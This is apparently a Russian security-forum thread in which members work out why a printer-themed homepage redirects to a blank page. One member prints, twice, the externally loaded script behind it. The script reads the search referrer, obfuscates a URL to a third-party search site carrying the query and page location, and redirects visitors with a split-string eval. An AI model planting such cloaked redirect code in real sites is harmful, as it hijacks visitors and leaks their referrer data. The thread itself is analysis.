Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | |
Да там все просто =) 27.06.06 13:46 Число просмотров: 1954
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 27.06.06 13:47 Количество правок: 1
|
смотрим в index.htm и видим строчку
<script language='JavaScript' src='http://supermegacounter.info/inc/script.js' type='text/JavaScript'></script>
качаем файлик http://supermegacounter.info/inc/script.js
var ref = document.referrer;
var domain = document.referrer;
var key = "";
if ((ref != null) && (ref.length > 0)) {
var queries = new Array("query", "qt", "q", "p");
for (j = 0; j < queries.length; j ++) {
var off = queries[j].length + 2;
var i = ref.indexOf('?' + queries[j] + '=');
if (i == -1) { i = ref.indexOf('&' + queries[j] + '='); }
if (i != -1) {
ref = ref.substr(i + off);
i = ref.indexOf('&');
if (i == -1) { i = ref.length; }
key = ref.substr(0, i);
break;
}
}
}
var reff = document.referrer;
if (reff.indexOf('.google.')!=-1|reff.indexOf('.msn.')!=-1|reff.indexOf('.yahoo.')!=-1|reff.indexOf('.aol.')!=-1|reff.indexOf('.ask.')!=-1|reff.indexOf('.altavista.')!=-1|reff.indexOf('85.249.19.91')!=-1) {
var url = "h"+"tt"+"p:/"+"/sear"+"chitq"+"uick.org"+"/?q="+key;
url = url + "&ref=" + escape(document.referrer);
url = url + "&s=" + escape(document.location.href);
if(reff.indexOf('.google.')!=-1){
url = url + "&saff=4";
}else{
if(reff.indexOf('.msn.')!=-1){
url = url + "&saff=5";
}else{
if(reff.indexOf('.yahoo.')!=-1){
url = url + "&saff=6";
}
}
}
}
else {
var url = "a"+"b"+"ou"+"t"+":bl"+"a"+"nk";
}
var d = document;
eval("d.lo"+"cat"+"ion.hr"+"ef=url");
---
т.е. реферер неизвестен => шлет на about:blank =)))
|
|
<miscellaneous>
|
Поздравляю с ДР Monochrome laser printer. (Пошёл по кабинетам поздравлять свои LaserJetы :-) 27.06.06 12:38
Автор: Woonder <Бученков Андрей> Статус: Member
|
|
|
|
что странно, его хомпага ведет на about:blank =) (IE 6.0) 27.06.06 12:41
Автор: DamNet <Denis Amelin> Статус: Elderman
|
|
|
| |
Я два раза, пробовал, думал это я торможу, а потом начал разбор... 27.06.06 13:02
Автор: Woonder <Бученков Андрей> Статус: Member
|
ны его ссылку сервер выдаёт 403 Moved Permanently и перенаправляет на http://printer.tuningbazar.com/
а вот дальше IE выдаёт about:blank. опера выдаёт opera:blank
скачал index.htm Флешгетом, в соурсе ничего необычного не нашёл, хотя я не спец в вебдизайне, может кто лучше разбирается пояснит, в чём прикол.
Понимаю что что-то упустил из виду, и чувствую себя не лучшим образом. Не люблю, когда что-то не понимаю :(
|
| | |
Да там все просто =) 27.06.06 13:46
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 27.06.06 13:47 Количество правок: 1
|
смотрим в index.htm и видим строчку
<script language='JavaScript' src='http://supermegacounter.info/inc/script.js' type='text/JavaScript'></script>
качаем файлик http://supermegacounter.info/inc/script.js
var ref = document.referrer;
var domain = document.referrer;
var key = "";
if ((ref != null) && (ref.length > 0)) {
var queries = new Array("query", "qt", "q", "p");
for (j = 0; j < queries.length; j ++) {
var off = queries[j].length + 2;
var i = ref.indexOf('?' + queries[j] + '=');
if (i == -1) { i = ref.indexOf('&' + queries[j] + '='); }
if (i != -1) {
ref = ref.substr(i + off);
i = ref.indexOf('&');
if (i == -1) { i = ref.length; }
key = ref.substr(0, i);
break;
}
}
}
var reff = document.referrer;
if (reff.indexOf('.google.')!=-1|reff.indexOf('.msn.')!=-1|reff.indexOf('.yahoo.')!=-1|reff.indexOf('.aol.')!=-1|reff.indexOf('.ask.')!=-1|reff.indexOf('.altavista.')!=-1|reff.indexOf('85.249.19.91')!=-1) {
var url = "h"+"tt"+"p:/"+"/sear"+"chitq"+"uick.org"+"/?q="+key;
url = url + "&ref=" + escape(document.referrer);
url = url + "&s=" + escape(document.location.href);
if(reff.indexOf('.google.')!=-1){
url = url + "&saff=4";
}else{
if(reff.indexOf('.msn.')!=-1){
url = url + "&saff=5";
}else{
if(reff.indexOf('.yahoo.')!=-1){
url = url + "&saff=6";
}
}
}
}
else {
var url = "a"+"b"+"ou"+"t"+":bl"+"a"+"nk";
}
var d = document;
eval("d.lo"+"cat"+"ion.hr"+"ef=url");
---
т.е. реферер неизвестен => шлет на about:blank =)))
|
| | | |
Спасибо, с этим ясно - Следущий вопросик.. 28.06.06 02:10
Автор: Woonder <Бученков Андрей> Статус: Member
|
Спасибо, учится не когда не поздно.
Следующий вопрос,
Судя по скрипту он при любом раскладе делает перенаправление, различаются только цели.
Тогда зачем в index.htm весь остальной код ?
Где смысл?
Буду длагодарен за урок :)
|
| | | | |
Хех... для поисковиков, конечно. Видел как они завуалировали это пернаправление?.. Это чтобы робот принял страницу за чистую монету (не от людей же они так шифруются =)) 28.06.06 02:51
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 28.06.06 03:07 Количество правок: 1
|
|
|
|
|
подробно о проекте
Анализ криптографических сетевых...
